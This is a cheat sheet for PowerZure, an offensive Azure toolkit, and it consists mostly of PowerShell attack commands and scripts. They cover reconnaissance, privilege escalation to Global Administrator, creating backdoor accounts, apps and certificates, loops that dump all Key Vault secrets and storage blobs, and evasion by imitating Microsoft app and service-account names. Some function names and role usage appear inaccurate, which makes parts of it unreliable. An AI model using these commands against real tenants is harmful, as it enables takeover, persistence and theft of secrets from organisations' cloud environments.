PowerZure Azure Security Assessment Tool Cheat Sheet

Overview

PowerZure is a PowerShell project created by Ryan Hausknecht (@haus3c) for assessing Azure security. It provides a comprehensive set of functions for Azure reconnaissance, privilege escalation, persistence, and data exfiltration in Azure environments.

⚠️ Warning: This tool is intended for authorized penetration testing and security assessments only. Ensure you have proper authorization before using in any environment.

Installation

PowerShell Gallery Installation

# Install from PowerShell Gallery
Install-Module -Name PowerZure

# Install for current user only
Install-Module -Name PowerZure -Scope CurrentUser

# Update existing installation
Update-Module -Name PowerZure

# Import module
Import-Module PowerZure

Manual Installation

# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/hausec/PowerZure/archive/master.zip" -OutFile "PowerZure.zip"
Expand-Archive -Path "PowerZure.zip" -DestinationPath "C:\Tools\"

# Import module
Import-Module C:\Tools\PowerZure-master\PowerZure.psd1

# Install dependencies
Install-Module -Name Az
Install-Module -Name AzureAD

Git Installation

# Clone repository
git clone https://github.com/hausec/PowerZure.git
cd PowerZure

# Import in PowerShell
Import-Module .\PowerZure.psd1

Basic Usage

Module Setup

# Import PowerZure
Import-Module PowerZure

# Get available commands
Get-Command -Module PowerZure

# Get help for specific function
Get-Help Invoke-AzureRecon -Full

# Check module version
Get-Module PowerZure

Authentication

# Interactive authentication
Connect-AzAccount

# Service principal authentication
$credential = Get-Credential
Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"

# Certificate authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id"

# Managed identity authentication (from Azure VM)
Connect-AzAccount -Identity

Command Reference

Reconnaissance Functions

Function	Description
Invoke-AzureRecon	Comprehensive Azure reconnaissance
Get-AzureTargets	Identify potential targets
Get-AzureUsers	Enumerate Azure AD users
Get-AzureGroups	Enumerate Azure AD groups
Get-AzureApps	Enumerate applications
Get-AzureResources	Enumerate Azure resources

Privilege Escalation Functions

Function	Description
Invoke-AzurePrivEsc	Automated privilege escalation
Get-AzureRoleAssignments	Check role assignments
Set-AzureRole	Assign roles to principals
Get-AzureKeyVaults	Enumerate Key Vaults
Get-AzureVMs	Enumerate virtual machines

Persistence Functions

Function	Description
New-AzureBackdoor	Create backdoor accounts
Set-AzureUserPassword	Change user passwords
New-AzureApplication	Create malicious applications
Add-AzureKeyVaultSecret	Add secrets to Key Vault

Reconnaissance and Information Gathering

Comprehensive Reconnaissance

# Run full reconnaissance
Invoke-AzureRecon

# Reconnaissance with specific subscription
Invoke-AzureRecon -SubscriptionId "subscription-id"

# Save reconnaissance results
Invoke-AzureRecon | Out-File "azure_recon.txt"

# Reconnaissance with verbose output
Invoke-AzureRecon -Verbose

User and Group Enumeration

# Get all Azure AD users
$users = Get-AzureUsers

# Get users with specific role
$adminUsers = Get-AzureUsers | Where-Object {$_.AssignedRoles -contains "Global Administrator"}

# Get all groups
$groups = Get-AzureGroups

# Get group members
$groupMembers = Get-AzureGroupMembers -GroupId "group-id"

# Get privileged groups
$privilegedGroups = Get-AzureGroups | Where-Object {$_.DisplayName -like "*admin*"}

Application and Service Principal Enumeration

# Get all applications
$apps = Get-AzureApps

# Get applications with high privileges
$highPrivApps = Get-AzureApps | Where-Object {$_.RequiredResourceAccess.ResourceAppId -contains "00000003-0000-0000-c000-000000000000"}

# Get service principals
$servicePrincipals = Get-AzureServicePrincipals

# Get application secrets and certificates
$appSecrets = Get-AzureAppSecrets -ApplicationId "app-id"

Resource Enumeration

# Get all Azure resources
$resources = Get-AzureResources

# Get virtual machines
$vms = Get-AzureVMs

# Get storage accounts
$storageAccounts = Get-AzureStorageAccounts

# Get Key Vaults
$keyVaults = Get-AzureKeyVaults

# Get SQL databases
$sqlDatabases = Get-AzureSQLDatabases

Subscription and Tenant Information

# Get tenant information
$tenantInfo = Get-AzureTenantInfo

# Get subscription information
$subscriptions = Get-AzureSubscriptions

# Get current context
$context = Get-AzContext

# Get role assignments
$roleAssignments = Get-AzureRoleAssignments

Privilege Escalation

Automated Privilege Escalation

# Run automated privilege escalation
Invoke-AzurePrivEsc

# Privilege escalation with specific target
Invoke-AzurePrivEsc -Target "subscription-id"

# Check for privilege escalation paths
Get-AzurePrivEscPaths

# Test specific privilege escalation technique
Test-AzurePrivEsc -Technique "RoleAssignment"

Role-Based Privilege Escalation

# Check current role assignments
$currentRoles = Get-AzRoleAssignment

# Assign Global Administrator role
Set-AzureRole -PrincipalId "user-id" -RoleDefinitionName "Global Administrator"

# Assign Contributor role to subscription
Set-AzureRole -PrincipalId "user-id" -RoleDefinitionName "Contributor" -Scope "/subscriptions/subscription-id"

# Create custom role with high privileges
$customRole = New-AzureCustomRole -Name "CustomAdmin" -Permissions @("*")

Key Vault Privilege Escalation

# Check Key Vault access
$keyVaultAccess = Test-AzureKeyVaultAccess -VaultName "vault-name"

# Get Key Vault secrets
$secrets = Get-AzureKeyVaultSecrets -VaultName "vault-name"

# Extract credentials from Key Vault
$credentials = Get-AzureKeyVaultCredentials -VaultName "vault-name"

# Add malicious secret to Key Vault
Add-AzureKeyVaultSecret -VaultName "vault-name" -SecretName "backdoor" -SecretValue "password123"

Virtual Machine Privilege Escalation

# Check VM access
$vmAccess = Test-AzureVMAccess -VMName "vm-name"

# Execute commands on VM
Invoke-AzureVMCommand -VMName "vm-name" -Command "whoami"

# Get VM credentials
$vmCreds = Get-AzureVMCredentials -VMName "vm-name"

# Install backdoor on VM
Install-AzureVMBackdoor -VMName "vm-name"

Persistence Techniques

User Account Persistence

# Create backdoor user
New-AzureBackdoor -Username "service-account" -Password "ComplexPassword123"

# Change existing user password
Set-AzureUserPassword -UserPrincipalName "user@domain.com" -Password "NewPassword123"

# Add user to privileged group
Add-AzureUserToGroup -UserPrincipalName "user@domain.com" -GroupId "admin-group-id"

# Assign privileged role to user
Set-AzureRole -PrincipalId "user-id" -RoleDefinitionName "Global Administrator"

Application-Based Persistence

# Create malicious application
$app = New-AzureApplication -DisplayName "LegitimateApp" -RequiredResourceAccess $permissions

# Add application secret
$secret = New-AzureApplicationSecret -ApplicationId $app.AppId

# Grant application permissions
Grant-AzureApplicationPermissions -ApplicationId $app.AppId -Permissions @("User.Read.All", "Directory.Read.All")

# Create service principal for application
$sp = New-AzureServicePrincipal -ApplicationId $app.AppId

Certificate-Based Persistence

# Generate certificate for authentication
$cert = New-SelfSignedCertificate -Subject "CN=BackdoorCert" -CertStoreLocation "Cert:\CurrentUser\My"

# Add certificate to application
Add-AzureApplicationCertificate -ApplicationId "app-id" -Certificate $cert

# Use certificate for authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint $cert.Thumbprint -ApplicationId "app-id" -TenantId "tenant-id"

Resource-Based Persistence

# Create backdoor storage account
$storageAccount = New-AzureStorageAccount -Name "backdoorstorage" -ResourceGroupName "rg-name"

# Create backdoor Key Vault
$keyVault = New-AzureKeyVault -Name "backdoorvault" -ResourceGroupName "rg-name"

# Create backdoor virtual machine
$vm = New-AzureVM -Name "backdoorvm" -ResourceGroupName "rg-name" -Credential $cred

Data Exfiltration

Azure AD Data Exfiltration

# Export all users
$users = Get-AzureUsers
$users | Export-Csv -Path "azure_users.csv" -NoTypeInformation

# Export group memberships
$groups = Get-AzureGroups
foreach ($group in $groups) {
    $members = Get-AzureGroupMembers -GroupId $group.Id
    $group | Add-Member -NotePropertyName "Members" -NotePropertyValue $members
}
$groups | ConvertTo-Json -Depth 3 | Out-File "azure_groups.json"

# Export application information
$apps = Get-AzureApps
$apps | Export-Csv -Path "azure_applications.csv" -NoTypeInformation

Storage Account Data Exfiltration

# List storage accounts
$storageAccounts = Get-AzureStorageAccounts

# Download blobs from storage account
foreach ($account in $storageAccounts) {
    $ctx = New-AzStorageContext -StorageAccountName $account.Name -UseConnectedAccount
    $containers = Get-AzStorageContainer -Context $ctx
    
    foreach ($container in $containers) {
        $blobs = Get-AzStorageBlob -Container $container.Name -Context $ctx
        foreach ($blob in $blobs) {
            Get-AzStorageBlobContent -Blob $blob.Name -Container $container.Name -Context $ctx -Destination ".\downloads\"
        }
    }
}

Key Vault Data Exfiltration

# Extract all Key Vault secrets
$keyVaults = Get-AzureKeyVaults

foreach ($vault in $keyVaults) {
    try {
        $secrets = Get-AzKeyVaultSecret -VaultName $vault.Name
        foreach ($secret in $secrets) {
            $secretValue = Get-AzKeyVaultSecret -VaultName $vault.Name -Name $secret.Name -AsPlainText
            Write-Output "Vault: $($vault.Name), Secret: $($secret.Name), Value: $secretValue"
        }
    }
    catch {
        Write-Warning "Cannot access vault: $($vault.Name)"
    }
}

Database Data Exfiltration

# Extract SQL database information
$sqlServers = Get-AzSqlServer

foreach ($server in $sqlServers) {
    $databases = Get-AzSqlDatabase -ServerName $server.ServerName -ResourceGroupName $server.ResourceGroupName
    
    foreach ($database in $databases) {
        # Attempt to connect and extract data
        try {
            $connectionString = "Server=$($server.FullyQualifiedDomainName);Database=$($database.DatabaseName);Integrated Security=true;"
            # Use connection string to extract data
        }
        catch {
            Write-Warning "Cannot access database: $($database.DatabaseName)"
        }
    }
}

Advanced Attack Techniques

Token Manipulation

# Get current access token
$token = [Microsoft.Azure.Commands.Common.Authentication.AzureSession]::Instance.AuthenticationFactory.Authenticate($context.Account, $context.Environment, $context.Tenant.Id, $null, "https://management.azure.com/", $null).AccessToken

# Parse JWT token
$tokenParts = $token.Split('.')
$header = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($tokenParts[0]))
$payload = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($tokenParts[1]))

# Use token for API calls
$headers = @{
    'Authorization' = "Bearer $token"
    'Content-Type' = 'application/json'
}

Cross-Tenant Attacks

# Enumerate accessible tenants
$tenants = Get-AzTenant

# Switch between tenants
foreach ($tenant in $tenants) {
    Set-AzContext -TenantId $tenant.Id
    Write-Output "Current tenant: $($tenant.Id)"
    
    # Perform reconnaissance in each tenant
    Invoke-AzureRecon
}

Resource Group Takeover

# Find resource groups with weak permissions
$resourceGroups = Get-AzResourceGroup

foreach ($rg in $resourceGroups) {
    $roleAssignments = Get-AzRoleAssignment -Scope $rg.ResourceId
    
    # Check for overprivileged assignments
    $dangerousRoles = $roleAssignments | Where-Object {$_.RoleDefinitionName -in @("Owner", "Contributor", "User Access Administrator")}
    
    if ($dangerousRoles) {
        Write-Output "Potentially exploitable resource group: $($rg.ResourceGroupName)"
    }
}

Evasion Techniques

Stealth Operations

# Use legitimate application names
$stealthApp = New-AzureApplication -DisplayName "Microsoft Graph PowerShell"

# Mimic legitimate service accounts
$stealthUser = New-AzureUser -UserPrincipalName "sync-service@company.com" -DisplayName "Directory Sync Service"

# Use existing application IDs
$graphAppId = "14d82eec-204b-4c2f-b7e8-296a70dab67e"  # Microsoft Graph PowerShell

Rate Limiting Evasion

# Implement delays between operations
function Invoke-AzureOperationWithDelay {
    param($Operation, $Delay = 2)
    
    & $Operation
    Start-Sleep -Seconds $Delay
}

# Randomize operation timing
$users = Get-AzureUsers
foreach ($user in $users) {
    $delay = Get-Random -Minimum 1 -Maximum 5
    Start-Sleep -Seconds $delay
    $groups = Get-AzureUserGroups -UserId $user.Id
}

Log Evasion

# Perform operations during business hours
$currentHour = (Get-Date).Hour
if ($currentHour -ge 9 -and $currentHour -le 17) {
    # Perform stealthy operations
    Invoke-AzureRecon
}

# Use service principal instead of user account
Connect-AzAccount -ServicePrincipal -Credential $spCredential -TenantId $tenantId

Automation and Scripting

Automated Assessment Script

# Comprehensive Azure security assessment
param(
    [string]$TenantId,
    [string]$SubscriptionId,
    [string]$OutputPath = ".\azure_assessment"
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

# Authenticate
Connect-AzAccount -TenantId $TenantId

# Set subscription context
if ($SubscriptionId) {
    Set-AzContext -SubscriptionId $SubscriptionId
}

# Perform reconnaissance
Write-Host "Performing reconnaissance..."
$recon = Invoke-AzureRecon
$recon | Out-File "$OutputPath\reconnaissance.txt"

# Check for privilege escalation opportunities
Write-Host "Checking privilege escalation paths..."
$privesc = Invoke-AzurePrivEsc
$privesc | Out-File "$OutputPath\privilege_escalation.txt"

# Export user and group information
Write-Host "Exporting user and group data..."
$users = Get-AzureUsers
$users | Export-Csv "$OutputPath\users.csv" -NoTypeInformation

$groups = Get-AzureGroups
$groups | Export-Csv "$OutputPath\groups.csv" -NoTypeInformation

# Export application information
Write-Host "Exporting application data..."
$apps = Get-AzureApps
$apps | Export-Csv "$OutputPath\applications.csv" -NoTypeInformation

# Generate summary report
$summary = @{
    AssessmentDate = Get-Date
    TenantId = $TenantId
    SubscriptionId = $SubscriptionId
    TotalUsers = $users.Count
    TotalGroups = $groups.Count
    TotalApplications = $apps.Count
    PrivilegeEscalationPaths = $privesc.Count
}

$summary | ConvertTo-Json | Out-File "$OutputPath\summary.json"

Write-Host "Assessment completed. Results saved to $OutputPath"

Continuous Monitoring Script

# Continuous Azure monitoring script
param(
    [int]$IntervalMinutes = 60,
    [string]$LogPath = ".\azure_monitoring.log"
)

while ($true) {
    $timestamp = Get-Date
    Write-Output "[$timestamp] Starting Azure monitoring cycle" | Tee-Object -FilePath $LogPath -Append
    
    try {
        # Check for new users
        $newUsers = Get-AzureUsers | Where-Object {$_.CreatedDateTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)}
        if ($newUsers) {
            Write-Output "[$timestamp] New users detected: $($newUsers.Count)" | Tee-Object -FilePath $LogPath -Append
        }
        
        # Check for new applications
        $newApps = Get-AzureApps | Where-Object {$_.CreatedDateTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)}
        if ($newApps) {
            Write-Output "[$timestamp] New applications detected: $($newApps.Count)" | Tee-Object -FilePath $LogPath -Append
        }
        
        # Check for role assignments
        $recentRoleAssignments = Get-AzRoleAssignment | Where-Object {$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)}
        if ($recentRoleAssignments) {
            Write-Output "[$timestamp] New role assignments detected: $($recentRoleAssignments.Count)" | Tee-Object -FilePath $LogPath -Append
        }
    }
    catch {
        Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)" | Tee-Object -FilePath $LogPath -Append
    }
    
    Start-Sleep -Seconds ($IntervalMinutes * 60)
}

Troubleshooting

Authentication Issues

# Clear cached credentials
Clear-AzContext -Force

# Test authentication
$context = Get-AzContext
if (-not $context) {
    Write-Error "Not authenticated to Azure"
    Connect-AzAccount
}

# Verify permissions
$currentUser = Get-AzADUser -UserPrincipalName (Get-AzContext).Account.Id
$roleAssignments = Get-AzRoleAssignment -ObjectId $currentUser.Id

Module Issues

# Check PowerZure installation
Get-Module PowerZure -ListAvailable

# Update PowerZure
Update-Module PowerZure -Force

# Reinstall if necessary
Uninstall-Module PowerZure
Install-Module PowerZure -Force

Permission Issues

# Check current permissions
$permissions = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id

# Test specific permissions
try {
    Get-AzADUser -First 1
    Write-Output "User read permission: OK"
}
catch {
    Write-Output "User read permission: DENIED"
}

# Request additional permissions
Write-Output "Required permissions:"
Write-Output "- Directory.Read.All"
Write-Output "- User.Read.All"
Write-Output "- Application.Read.All"

Integration with Other Tools

BloodHound Integration

# Export data for BloodHound
$users = Get-AzureUsers
$groups = Get-AzureGroups
$apps = Get-AzureApps

# Convert to BloodHound format
$bloodhoundData = @{
    users = $users | ForEach-Object {
        @{
            ObjectIdentifier = $_.Id
            Properties = @{
                name = $_.UserPrincipalName
                displayname = $_.DisplayName
                enabled = $_.AccountEnabled
            }
        }
    }
    groups = $groups | ForEach-Object {
        @{
            ObjectIdentifier = $_.Id
            Properties = @{
                name = $_.DisplayName
                description = $_.Description
            }
        }
    }
}

$bloodhoundData | ConvertTo-Json -Depth 3 | Out-File "azure_bloodhound.json"

ROADtools Integration

# Export data for ROADtools
$azureData = @{
    users = Get-AzureUsers
    groups = Get-AzureGroups
    applications = Get-AzureApps
    servicePrincipals = Get-AzureServicePrincipals
}

$azureData | ConvertTo-Json -Depth 3 | Out-File "azure_roadtools.json"

Resources

• PowerZure GitHub Repository
• Ryan Hausknecht Blog
• Azure Security Documentation
• Azure AD Security Best Practices
• Azure PowerShell Documentation

---

This cheat sheet provides a comprehensive reference for using PowerZure. Always ensure you have proper authorization before conducting Azure security assessments.